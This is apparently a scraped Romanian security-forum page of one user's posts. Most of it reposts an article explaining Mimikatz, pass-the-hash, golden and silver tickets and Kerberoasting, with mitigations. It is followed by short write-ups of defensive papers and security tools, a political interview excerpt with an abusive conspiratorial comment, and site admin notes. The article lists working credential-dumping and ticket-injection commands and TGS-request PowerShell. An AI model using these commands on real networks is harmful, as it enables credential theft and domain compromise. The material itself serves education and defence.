performs a one-way hash function on the user’s password and the result is referred to as a “hash.” The one-way hash algorithm changes the password in expected ways given the input data (the password) with the result being scrambled data that can’t be reverted back to the original input data, the password. Hashing a password into a hash is like putting a steak through a meat grinder to make ground beef – the ground beef can never be put together to be the same steak again. Pass the Hash has many variants, from Pass the Ticket to OverPass the Hash (aka pass the key). The following quote is a Google Translate English translated version of the Mimikatz website (which is in French). Contrary to what could easily be imagined, Windows does not use the password of the user as a shared secret, but non-reversible derivatives: LM hash, NTLM, DES keys, AES … According to the protocol, the secret and the algorithms used are different: [TABLE] [TR] [TH] Protocol[/TH] [TH] Algorithm[/TH] [TH] Secret used[/TH] [/TR] [TR] [TD] LM[/TD] [TD] DES-ECB[/TD] [TD] LM Hash[/TD] [/TR] [TR] [TD] NTLMv1[/TD] [TD] DES-ECB[/TD] [TD] NT Hash[/TD] [/TR] [TR] [TD] NTLMv2[/TD] [TD] HMAC-MD5[/TD] [TD] NT Hash[/TD] [/TR] [/TABLE] Mimikatz OS support: Windows XP Windows Vista Windows 7 Windows 8 Windows Server 2003 Windows Server 2008 / 2008 R2 Windows Server 2012 / 2012 R2 Windows 10 (beta support) Since Windows encrypts most credentials in memory (LSASS), they should be protected, but it is a type of reversible encryption (though creds are in clear-text). Encrypt works with LsaProtectMemory and decrypt with LsaUnprotectMemory. NT5 encryption types: RC4 & DESx NT6 encryption types: 3DES & AES Mimikatz capabilities: Dump credentials from LSASS (Windows Local Security Account database) [sekurlsa module] MSV1.0: hashes & keys (dpapi) Kerberos password, ekeys, tickets, & PIN TsPkg (password) WDigest (clear-text password) LiveSSP (clear-text password) SSP (clear-text password) [*]Generate Kerberos Golden Tickets (Kerberos TGT logon token ticket attack) [*]Generate Kerberos Silver Tickets (Kerberos TGS service ticket attack) [*]Export certificates and keys (even those not normally exportable). [*]Dump cached credentials [*]Stop event monitoring. [*]Bypass Microsoft AppLocker / Software Restriction Polcies [*]Patch Terminal Server [*]Basic GPO bypass Items in bold denotes functionality provided by the PowerSploit Invoke-Mimikatz module with built-in parameters. Other mimikatz commands may work using the command parameter. Mimikatz Command Overview: The primary command components are sekurlsa, kerberos, crypto, vault, and lsadump. Sekurlsa interacts with the LSASS process in memory to gather credential data and provides enhanced capability over kerberos. The Mimikatz kerberos command set enables modification of Kerberos tickets and interacts with the official Microsoft Kerberos API. This is the command that creates Golden Tickets. Pass the ticket is also possible with this command since it can inject Kerberos ticket(s) (TGT or TGS) into the current session. External Kerberos tools may be used for session injection, but they must follow the Kerberos credential format (KRB_CRED). Mimikatz kerberos also enables the creation of Silver Tickets which are Kerberos tickets (TGT or TGS) with arbitrary data enabling AD user/ group impersonation. The key required for ticket creation depends on the type of ticket being generated: Golden tickets require the KRBTGT account NTLM password hash. Silver tickets require the computer or service account’s NTLM password hash. Crypto enables export of certificates on the system that are not marked exportable since it bypasses the standard export process. Vault enables dumping data from the Windows vault. Lsadump enables dumping credential data from the Security Account Manager (SAM) database which contains the NTLM (sometimes LM hash) and supports online and offline mode as well as dumping credential data from the LSASS process in memory. Lsadump can also be used to dump cached credentials. In a Windows domain, credentials are cached (up to 10) in case a Domain Controller is unavailable for authentication. However, these credentials are stored on the computer. These caches are located in the registry at the location HKEY_LOCAL_MACHINE\SECURITY\Cache (accessible SYSTEM). These entries are encrypted symmetrically, but we find some information about the user, as well as sufficient to verify the hash authentication. Further down is a more detailed list of mimikatz command functionality. Common Kerberos Attacks: Pass The Hash On Windows, a user provides the userid and password and the password is hashed, creating the password hash. When the user on one Windows system wants to access another, the user’s password hash is sent (passed) to the destination’s resource to authenticate. This means there is no need to crack the user’s password since the user’s password hash is all that’s needed to gain access. Contrary to what could easily be imagined, Windows does not use the password of the user as a shared secret, but non-reversible derivatives: LM hash, NTLM, DES keys, AES … Pass the Ticket (Google Translation) Extract an existing, valid Kerberos ticket from one machine and pass it to another one to gain access to resoiurces as that user. Over-Pass The Hash (aka Pass the Key) (Google Translation) Use the NTLM hash to obtain a valid user Kerberos ticket request. The user key (NTLM hash when using RC4) is used to encrypt the Pre-Authentication & first data requests. The following quote is a Google Translate English translated version of the Mimikatz website (which is in French): Authentication via Kerberos is a tad different. The client encrypts a timestamp from its user secret, possibly with parameters realm and iteration number sent from the server. If the secret is correct, the server can decrypt the timestamp (and the passage verify that the clocks are not too time-shifted). [TABLE] [TR] [TH] Protocol[/TH] [TH] Secret (key) used[/TH] [/TR] [TR] [TD] Kerberos[/TD] [TD] OF[/TD] [/TR] [TR] [TD] RC4 = NT Hash![/TD] [/TR] [TR] [TD] AES128[/TD] [/TR] [TR] [TD] AES256[/TD] [/TR] [/TABLE] Yes, the RC4 key type available and enabled by default in XP 8.1 is our NT hash! Kerberos Golden Ticket (Google Translation) The Kerberos Golden Ticket is a valid TGT Kerberos ticket since it is encrypted/signed by the domain Kerberos account (KRBTGT). The TGT is only used to prove to the KDC service on the Domain Controller that the user was authenticated by another Domain Controller. The fact that the TGT is encrypted by the KRBTGT password hash and can be decrypted by any KDC service in the domain proves it is valid. Golden Ticket Requirements: * Domain Name [AD PowerShell module: (Get-ADDomain).DNSRoot] * Domain SID [AD PowerShell module: (Get-ADDomain).DomainSID.Value] * Domain KRBTGT Account NTLM password hash * UserID for impersonation. The Domain Controller KDC service doesn’t perform PAC validation until the TGT is older than 20 minutes old, which means the attacker can make the ticket state the user with the TGT is a member of any group in Active Directory and the DC accepts it (until the 21st minute) and the PAC data (group membership) is placed in the TGS without validation. Microsoft’s MS-KILE specification (section 5.1.3 ): “Kerberos V5 does not provide account revocation checking for TGS requests, which allows TGT renewals and service tickets to be issued as long as the TGT is valid even if the account has been revoked. KILE provides a check account policy (section 3.3.5.7.1) that limits the exposure to a shorter time. KILE KDCs in the account domain are required to check accounts when the TGT is older than 20 minutes. This limits the period that a client can get a ticket with a revoked account while limiting the performance cost for AD queries.” Since the domain Kerberos policy is set on the ticket when generated by the KDC service on the Domain Controller, when the ticket is provided, systems trust the ticket validity. This means that even if the domain policy states a Kerberos logon ticket (TGT) is only valid for 10 hours, if the ticket states it is valid for 10 years, it is accepted as such. The KRBTGT account password is never changed* and the attacker can create Golden Tickets until the KRBTGT password is changed (twice). Note that a Golden Ticket created to impersonate a user persists even if the impersonated user changes their password. This crafted TGT requires an attacker to have the Active Directory domain’s KRBTGT password hash (typically dumped from a Domain Controller). The KRBTGT NTLM hash can be used to generate a valid TGT (using RC4) to impersonate any user with access to any resource in Active Directory. The Golden Ticket (TGT) be generated and used on any machine, even one not domain-joined. The created TGT can be used without requiring Debug rights. Mitigation: Limit Domain Admins from logging on to any other computers other than Domain Controllers and a handful of Admin servers (don’t let other admins log on to these servers) Delegate all other rights to custom admin groups. This greatly reduces the ability of an attacker to gain access to a Domain Controller’s Active Directory database. If the attacker can’t access the AD database (ntds.dit file), they can’t get the KRBTGT account NTLM password hash. Configuring Active Directory Kerberos to only allow AES may prevent Golden Tickets from being created. Another mitigation option is Microsoft KB2871997 which back-ports some of the enhanced security in Windows 8.1 and Windows 2012 R2. Kerberos Silver Ticket The Kerberos Silver Ticket is a valid Ticket Granting Service (TGS) Kerberos ticket since it is encrypted/signed by the service account configured with a Service Principal Name for each server the Kerberos-authenticating service runs on. While a Golden ticket is encrypted/signed with the KRBTGT, a Silver Ticket is encrypted/signed by the service account (computer account credential extracted from the computer’s local SAM or service account credential). We know from the Golden Ticket attack (described above) that the PAC isn’t validated for TGTs until they are older than 20 minutes. Most services don’t validate the PAC (by sending the TGS to the Domain Controller for PAC validation), so a valid TGS generated with the service account password hash can include a PAC that is entirely fictitious – even claiming the user is a Domain Admin without challenge or correction. Since service tickets are identical in format to TGTs albeit with a different service name, all you need to do is specify a different service name and use the RC4 (NTLM hash) of the account password (either the computer account for default services or the actual account) and you can now issue service tickets for the requested service. Note: You can also use the AES keys if you happen to have them instead of the NTLM key and it will still work It is worth noting, that services like MSSQL, Sharepoint, etc will only allow you to play with those services. The computer account will allow access to CIFS, service creation, and a whole host of other activities on the targeted computer. You can leverage the computer account into a shell with PSEXEC and you will be running as system on that particular computer. Lateral movement is then a matter of doing whatever you need to do from there http://passing-the-hash.blogspot.com/2014/09/pac-validation-20-minute-rule-and.html Service Account Password Cracking by attacking the Kerberos Session Ticket (TGS) NOTE: This attack does NOT require hacking tools on the network since it can be performed offline. The Kerberos session ticket (TGS) has a component that is encrypted with the service’s (either computer account or service account) password hash. The TGS for the service is generated and delivered to the user after the user’s TGT is presented to the KDC service on the Domain Controller. Since the service account’s password hash is used to encrypt the server component, it is possible to request the service TGS and perform an offline password attack. Only normal Kerberos traffic is observed on the wire: the TGT is delivered to the Domain Controller along with a TGS request and response. At this point, no further network traffic is required. Service accounts typically have weak passwords and are rarely changed making these excellent targets. Computer account passwords are changed about every 30 days and are extremely complex making them virtually uncrackable. Finding interesting service accounts is as simple as sending a Service Principal Name query to the Global Catalog. Service accounts often have elevated rights in Active Directory and since only a Kerberos service ticket (TGS) is required to attack the service account’s password, getting a TGS and saving it to another system to crack the password means this is a difficult attack to stop. Mitigation: Ensure all service accounts have long (>25 characters), complex passwords and only have the exact rights required (ensure the principle of least privilege). Tim Medin (@timmedin) describes this attack at his “Attacking Microsoft Kerberos: Kicking the Guard Dog of Hades” presentation at DerbyCon 2014. [slides: https://www.dropbox.com/s/1j6v6zbtsdg1kam/Kerberoast.pdf?dl=0 ] In his DerbyCon2014 presentation, Tim Medin provided PowerShell code examples for requesting a TGS. I have modified it slightly to add the $SPN variable. $SPN = “HTTP/sharepoint.adsecurity.org” Add-Type -AssemblyNAme System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList “$SPN” Pass the Cache (*nix systems) Linux/Unix systems (Mac OSX) store Kerberos credentials in a cache file. As of 11/23/2014, Mimikatz supports extracting the credential data for passing to Active Directory in a similar manner to the Pass the Hash/ Pass the Ticket method. Mimikatz Commands: logonpasswords: mimikatz # sekurlsa::logonpasswords) Extracts passwords in memory [*]pth (pass the hash): mimikatz # sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a A fake identity is created and the faske identitt’s NTLM hash is replaced with the real one. “ntlm hash is mandatory on XP/2003/Vista/2008 and before 7/2008r2/8/2012 kb2871997 (AES not available or replaceable)” “AES keys can be replaced only on 8.1/2012r2 or 7/2008r2/8/2012 with kb2871997, in this case you can avoid ntlm hash.” [*]ptt (pass the ticket): mimikatz # kerberos::ptt Enables Kerberos ticket (TGT or TGS) injection into the current session. [*]tickets: mimikatz # sekurlsa::tickets /export Identifies all session Kerberos tickets and lists/exports them. sekurlsa pulls the Kerberos data from memory and can access all user session tickets on the computer. [*]ekeys: mimikatz # sekurlsa::ekeys Extract the Kerberos ekeys from memory. Provides theft of a user account until the password is changed (which may be never for a Smartcard/PKI user). [*]dpapi: mimikatz # sekurlsa::dpapi [*]minidump: mimikatz # sekurlsa::minidump lsass.dmp Perform a minidump of the LSASS process and extract credential data from the lsass.dmp. A minidump can be saved off the computer for credential extraction later, but the major version of Windows must match (you can’t open the dump file from Windows 2012 on a Windows 2008 system). [*]kerberos: mimikatz # sekurlsa::kerberos Extracts the smartcad/PIV PIN from memory (cached in LSASS when using a smartcard). [*]debug: mimikatz # privilege::debug Sets debug mode for current mimikatz session enabling LSASS access. [*]lsadump cache: (requires token::elevate to be SYSTEM) mimikatz # lsadump::cache Dumps cached Windows domain credentials from HKEY_LOCAL_MACHINE\SECURITY\Cache (accessible SYSTEM). References: Benjamin Delpy’s blog (Google Translate English translated version) Mimikatz GitHub repository Mimikatz Github wiki Mimikatz 2 Presentation Slides (Benjamin Delpy, July 2014) All Mimikatz Presentation resources on blog.gentilkiwi.com Excel chart on OneDrive that shows what type of credential data is available in memory (LSASS), including on Windows 8.1 and Windows 2012 R2 which have enhanced protection mechanisms. PAC Validation issue aka the Silver Ticket description from the Passing the Hash Blog Sursa: http://adsecurity.org/?p=556
  10. Pass-the-hash attacks: Tools and Mitigation Although pass-the-hash attacks have been around for a little over thirteen years, the knowledge of its existence is still poor. This paper tries to fill a gap in the knowledge of this attack through the testing of the freely available tools that facilitate the attack. While other papers and resources focus primarily on running the tools and sometimes comparing them, this paper offers an in-depth, systematic comparison of the tools across the various Windows platforms, including AV detection rates. It also provides exte... Copyright SANS Institute Author Retains Full Rights Pass-the-hash attacks: Tools and Mitigation GIAC (GCIH) Gold Certification Author: Bashar Ewaida, bashar9090@live.com Advisor: Kristof Boeynaems Accepted: January 21st 2010 Abstract Although pass-*?the-*?hash attacks have been around for a little over thirteen years, the knowledge of its existence is still poor. This paper tries to fill a gap in the knowledge of this attack through the testing of the freely available tools that facilitate the attack. While other papers and resources focus primarily on running the tools and sometimes comparing them, this paper offers an in-*?depth, systematic comparison of the tools across the various Windows platforms, including AV detection rates. It also provides extensive advice to mitigate pass-*?the-*?hash attacks and discusses the pros and cons of some of the approaches used in mitigating the attack. Download: https://www.sans.org/reading-room/whitepapers/testing/pass-the-hash-attacks-tools-mitigation-33283
  11. Reducing the Effectiveness of Pass-the-Hash National Security Agency/Central Security Service Information Assurance Directorate Contents 1 Introduction .......................................................................................................................................... 1 2 Background ........................................................................................................................................... 1 3 Mitigations ............................................................................................................................................ 2 3.1 Creating unique local account passwords .................................................................................... 3 3.2 Denying local accounts from network logons ............................................................................... 4 3.3 Restricting lateral movement on the network with firewall rules ................................................ 5 4 Windows 8.1 Features .......................................................................................................................... 5 4.1 Deny local accounts from network logons in Windows 8.1 .......................................................... 5 4.2 New Remote Desktop feature in Windows 8.1 ............................................................................ 5 4.3 Protecting LSASS ........................................................................................................................... 6 4.4 Clearing credentials....................................................................................................................... 6 4.5 Protected Users group .................................................................................................................. 6 5 Conclusion ............................................................................................................................................. 7 6 References ............................................................................................................................................ 7 Appendix A: Creating unique local passwords .............................................................................................. 7 Appendix B: Denying local administrators network access .......................................................................... 8 Appendix C: Configuring Windows Firewall rules ......................................................................................... 9 Appendix D: Looking for possible PtH activity by examining Windows Event Logs ................................... 12 Appendix E: Summary of Local Accounts .................................................................................................... 12 Appendix F: Windows smartcard credentials ............................................................................................. 12 Download: https://www.nsa.gov/ia/_files/app/Reducing_the_Effectiveness_of_Pass-the-Hash.pdf
  12. Nytro

    WPScan

    [h=3]WPScan[/h] WPScan is a black box WordPress vulnerability scanner. Features Username enumeration (from author querystring and location header) Weak password cracking (multithreaded) Version enumeration (from generator meta tag and from client side files) Vulnerability enumeration (based on version) Plugin enumeration (2220 most popular by default) Plugin vulnerability enumeration (based on plugin name) Plugin enumeration list generation Other misc WordPress checks (theme name, dir listing, …) URL: http://wpscan.org Sursa: ToolsWatch.org – The Hackers Arsenal Tools Portal » 2014 Top Security Tools as Voted by ToolsWatch.org Readers
  13. [h=3]Brakeman[/h] Brakeman is a security scanner for Ruby on Rails applications. Unlike many web security scanners, Brakeman looks at the source code of your application. This means you do not need to set up your whole application stack to use it. Once Brakeman scans the application code, it produces a report of all security issues it has found. Features No Configuration Necessary Run It Anytime Better Coverage Best Practices Flexible Testing Speed URL: http://brakemanscanner.org Sursa: ToolsWatch.org – The Hackers Arsenal Tools Portal » 2014 Top Security Tools as Voted by ToolsWatch.org Readers
  14. [h=3]OWASP Offensive (Web) Testing Framework[/h] OWASP OWTF, Offensive (Web) Testing Framework is an OWASP+PTES-focused try to unite great tools and make pen testing more efficient, written mostly in Python. The purpose of this tool is to automate the manual, uncreative part of pen testing: For example, spending time trying to remember how to call “tool X”, parsing results of “tool X” manually to feed “tool Y”, etc. Features OWASP Testing Guide-oriented. Report updated on the fly. “Scumbag spidering”. Resilience. Easy to configure. Easy to run. Full control of what tests to run. Easy to review transaction logs and plain text files with URLs. Basic Google Hacking without (annoying) API Key requirements via “blanket searches”. Easy to extract data from the database to parse or pass to other tools. URL: https://www.owasp.org/index.php/OWASP_OWTF Sursa: ToolsWatch.org – The Hackers Arsenal Tools Portal » 2014 Top Security Tools as Voted by ToolsWatch.org Readers
  15. [h=3]PeStudio[/h] PeStudio is a unique tool that performs the static investigation of 32-bit and 64-bit executable. PEStudio is free for private non-commercial use only. Malicious executable often attempts to hide its malicious behavior and to evade detection. In doing so, it generally presents anomalies and suspicious patterns. The goal of PEStudio is to detect these anomalies, provide Indicators and score the Trust for the executable being analyzed. Since the executable file being analyzed is never started, you can inspect any unknown or malicious executable with no risk. Features References Indicators Virus Detection Imports Resources Report Prompt Interface URL: winitor Sursa: ToolsWatch.org – The Hackers Arsenal Tools Portal » 2014 Top Security Tools as Voted by ToolsWatch.org Readers
  16. [h=3]OWASP Xenotix XSS Exploit Framework[/h] OWASP Xenotix XSS Exploit Framework is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. Features Scanner Modules Information Gathering Modules Exploitation Modules Auxiliary Modules Xenotix Scripting Engine URL: https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Framework Sursa: ToolsWatch.org – The Hackers Arsenal Tools Portal » 2014 Top Security Tools as Voted by ToolsWatch.org Readers
  17. [h=3]BeEF – The Browser Exploitation Framework[/h] BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context. Features Key Logger. Bind Shells. Port Scanner. Clipboard Theft. Tor Detection. Integration with Metasploit Framework. Many Browser Exploitation Modules. Browser Functionality Detection. Mozilla Extension Exploitation Support. URL: http://beefproject.com Susa: ToolsWatch.org – The Hackers Arsenal Tools Portal » 2014 Top Security Tools as Voted by ToolsWatch.org Readers
  18. [h=3]Lynis[/h] Lynis is an auditing tool which tests and gathers (security) information from Unix based systems. The audience for this tool are security and system auditors, network specialists and system maintainers. Lynis performs an in-depth local scan on the system and is therefore much more thorough than network based vulnerability scanners. It starts with the bootloader and goes up to installed software packages. After the analysis it provides the administrator with discovered findings, including hints to further secure the system. Features System and security audit checks File Integrity Assessment System and file forensics Usage of templates/baselines (reporting and monitoring) Extended debugging features URL: https://cisofy.com/download/lynis/ Sursa: ToolsWatch.org – The Hackers Arsenal Tools Portal » 2014 Top Security Tools as Voted by ToolsWatch.org Readers
  19. [h=3]OWASP ZAP – Zed Attack Proxy Project[/h] The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually. Features Open source Cross platform (it even runs on a Raspberry Pi!) Easy to install (just requires java 1.7) Completely free (no paid for ‘Pro’ version) Ease of use a priority Comprehensive help pages Fully internationalized Translated into over 20 languages Community based, with involvement actively encouraged Under active development by an international team of volunteers URL: https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project Sursa: ToolsWatch.org – The Hackers Arsenal Tools Portal » 2014 Top Security Tools as Voted by ToolsWatch.org Readers
  20. Unhide is a forensic tool to find hidden processes and TCP/UDP ports by rootkits / LKMs or by another hidden technique. Unhide runs in Unix/Linux and Windows Systems. It implements six main techniques. Features Compare /proc vs /bin/ps output Compare info gathered from /bin/ps with info gathered by walking thru the procfs. ONLY for unhide-linux version Compare info gathered from /bin/ps with info gathered from syscalls (syscall scanning). Full PIDs space ocupation (PIDs bruteforcing). ONLY for unhide-linux version Compare /bin/ps output vs /proc, procfs walking and syscall. ONLY for unhide-linux version. Reverse search, verify that all thread seen by ps are also seen in the kernel. Quick compare /proc, procfs walking and syscall vs /bin/ps output. ONLY for unhide-linux version. It’s about 20 times faster than tests 1+2+3 but maybe give more false positives. URL: http://www.unhide-forensics.info Via: ToolsWatch.org – The Hackers Arsenal Tools Portal » 2014 Top Security Tools as Voted by ToolsWatch.org Readers
  21. "Legile 'Big Brother' ?i cea privind cartele prepay nu extind monitorizarea ?i nu permit accesul la con?inutul comunica?iilor telefonice sau electronice f?r? mandat de la judec?tor, d? asigur?ri directorul SRI, George Maior. Intr-un interviu acordat în exclusivitate Ziare.com, George Maior a explicat care sunt inten?iile în privin?a noii forme a legii reten?iei datelor ?i a cartelelor prepay ?i la ce date va permite accesul f?r? mandat de la judec?tor legea securit??ii cibernetice: 'Nu putem s? ac?ion?m în scop preventiv în aceast? er? cu mijloacele lui Sherlock Holmes'. Directorul SRI a r?spuns acuza?iilor potrivit c?rora serviciile secrete din România ar fi prea puternice ?i prea pu?in controlate ?i a f?cut clarific?ri în scandalul ofi?erilor acoperi?i: 'exist? un regim de incompatibilit??i la care ?inem foarte mult în operarea acestei arme excep?ionale'. Articol complet: http://www.sri.ro/fisiere/discursuriinterviuri/Interviu_ianuarie_2015.pdf Intrebare: Nici legea cartelelor prepay nu reprezint? o extindere a monitoriz?rii? R?spuns: Nu se extinde monitorizarea asupra convorbirilor private. Pur ?i simplu trebuie s? existe o eviden?? a celor care cump?r? aceste cartele anonimizate, a?a cum exist? în foarte multe state europene. N-a? spune c? exist? un standard, dar o practic? exist?. Merge?i în Germania, în Marea Britanie ?i încerca?i s? lua?i o asemenea cartel?. Doua persoane au confirmat ca au cumparat recent cartele din Germania si Marea Britanie fara buletin. Deci astia MINT. Muie! Daca o sa se aprobe astfel de legi, nu numai in Romania, dar si in alte state, inseamna ca "Charlie" a fost o inscenare, alte atacuri inventate, pentru un mai mare control asupra populatiei. Stiu ca e doar o teorie a conspiratiei, dar ganditi-va la asta. // Muie garda
  22. Tag-urile sunt pentru SEO. Par cam multe insa. Cine ne poate spune daca e ok sau nu?
  23. 5 Benefits of a penetration test January 5, 2015Adrian Furtuna Penetration testing projects are definitely fun for the passionate pentesters. However, the question is what are the real benefits of a pentest for the client company? What is the real value of a penetration test? Many clients have misconceptions and false assumptions about penetration testing and they are engaging this type of projects for the wrong reasons, like: After a penetration test I will be safe A penetration test will find all of my vulnerabilities I’ve heard that pentesting is ‘sexy’ so I would like one myself Companies who do penetration tests for these reasons do not get the real benefits of this service and they are practically throwing away the money. From my perspective, a penetration test has the following true benefits for the client company. Articol complet: 5 Benefits of a penetration test – Security Café
  24. Nu se vor recupera Like-urile anterioare. O sa ma ocup de homepage cand am putin timp.
  25. Am lasat in lateral doar Likes si Dislikes. Cred ca e de ajuns.
×
×
  • Create New...